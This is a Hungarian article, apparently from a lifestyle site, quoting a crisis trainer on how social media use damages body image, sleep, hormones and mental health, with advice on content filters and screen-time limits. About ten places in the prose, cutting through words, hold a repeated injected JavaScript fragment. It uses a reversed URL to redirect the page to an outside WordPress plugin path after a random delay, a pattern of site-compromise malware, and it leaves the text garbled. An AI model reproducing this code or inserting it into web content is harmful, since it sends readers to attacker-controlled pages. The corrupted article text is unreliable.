Észre sem vesszük, milyen negatív hatással van ránk a közösségi médiahasználat nap mint nap – mondja Murányi Edina, gyermek és felnőtt kríziskezelő tréner, ESP pszichológus, oktató. Edinához sokan fordulnak pszichés, sőt, testi panaszokkal is, hiszen krízishelyzet nem csak az életet fenyegető helyzet lehet.
“A testképünket, az önbizalmunkat és a világba vetett bizalmunkat is kikezdi a közösségi média használata. Azt azonban kevesen tudják, hogy ezek a rossz érzések kihatnak az idegrendszerünkre is. A szorongás sokszor alváshiányt vált ki, ami gyengíti az immunrendszer működését, így akár betegségek is kialakulhatnak általa” – mondja a szakember.
Megfelelési kényszert hoz a közösségi média
De mi a legnagyobb probléma a Facebook, az Instagram, a TikTok és a hasonló alkalmazások használatával? A folyamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos információáradat gyakran nem a valóságot mutatja be, a megfelelési kényszer pedig állandósuló szorongást generál bennünk.
“A pszichés testképzavarunk kivetül a fizikai testünkre is. Széteffektelt, szinte futurisztikus képeket nézegetünk másokról, ahol mindenkinek hibátlan a bőre és olyan tökéletes az alakja, mint egy magazincímlapon. Ez súlyosan csonkítja az egészséges testképet – gondoljunk bele egy frissen szült anyuka helyzetébe, akinél az ilyen képek depressziót okozhatnak!” – mondja Murányi Edina, akit saját oldalán is sokan keresnek fel hasonló problémákkal.
Hozzáteszi: a közösségi média lehet inspiráló is, ha olyan embereket követünk, akik meg merik mutatni önmagukat, netán ötleteket merítünk másoktól.
“A többiek mindennapjaiba betekintést nyerni akár pozitív dolog is lehetne, ám ehhez nagyon tudatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan kellene böngésznünk. Aki mindent ‘megeszik’ és nem szűri a tartalmakat, az rendkívül káros hatásoknak teszi ki magát” – fűzi hozzá.
Túlélési eszköz lett a tudatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosság
Az idegrendszer túlterheltsége ingerültté, nyugtalanná tesz, amitől beindul a “lavina”: felborulhat az emésztés, a menstruációs ciklus, a hormonháztartás. Mindez pedig akár hajhulláshoz, pajzsmirigy problémák vagy egyéb betegségek kialakulásához is vezethet.
De kiket érint ma a probléma? A szakember szerint hazánkban gyakorlatilag mindenkit. A bulimia például távolról sem csak a kislányok betegsége: fiúk is gyakran hánytatják magukat, ráadásul egyre kisebb gyermekek.
“Úgy gondolom, hogy közvetlenül vagy közvetetten, de Magyarországon mindenki érintett lehet. Még az újszülöttek is, hiszen a mentális és fizikai elváltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozások – az anyán és apán keresztül – a csecsemőre is kihatással vannak. Az ingerültebb kommunikáció kihat a szoptatás, az érintés, az érzelmi kontaktus minőségére is.”
Több odafigyeléssel megelőzhetjük a bajt
Mit tehetünk hát, hogy csökkentsük a közösségi médiához kapcsolódó stresszt? Érdemes a készüléken a tartalmi szűrők beállítása: például 2-3 érdeklődési kör kijelölése, hogy ne folytoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton mások életével legyünk elfoglalva.
A szakember szerint fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos lenne a képernyőidő maximalizálása is. Ideális esetben naponta legfeljebb fél órát ülnénk a Facebook előtt, órákat semmiképp. Ehhez azonban olyan fokú tudatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosságra van szükség, aminek sokan nincsenek birtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokában.
“Túlzás nélkül mondható, hogy életmentővé vált a mélyebb önismeret: hogy megtanuljunk tudatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosan jelen lenni, észrevenni a saját testünk vészjelzéseit. Az életmódváltás mellett azonban érdemes szakemberi segítséget is igénybe vennünk, ha megtehetjük. Ma már széles a paletta, ráadásul sokaknak egy bizalmas beszélgetés is jót tesz” – zárja az ESP pszichológus.
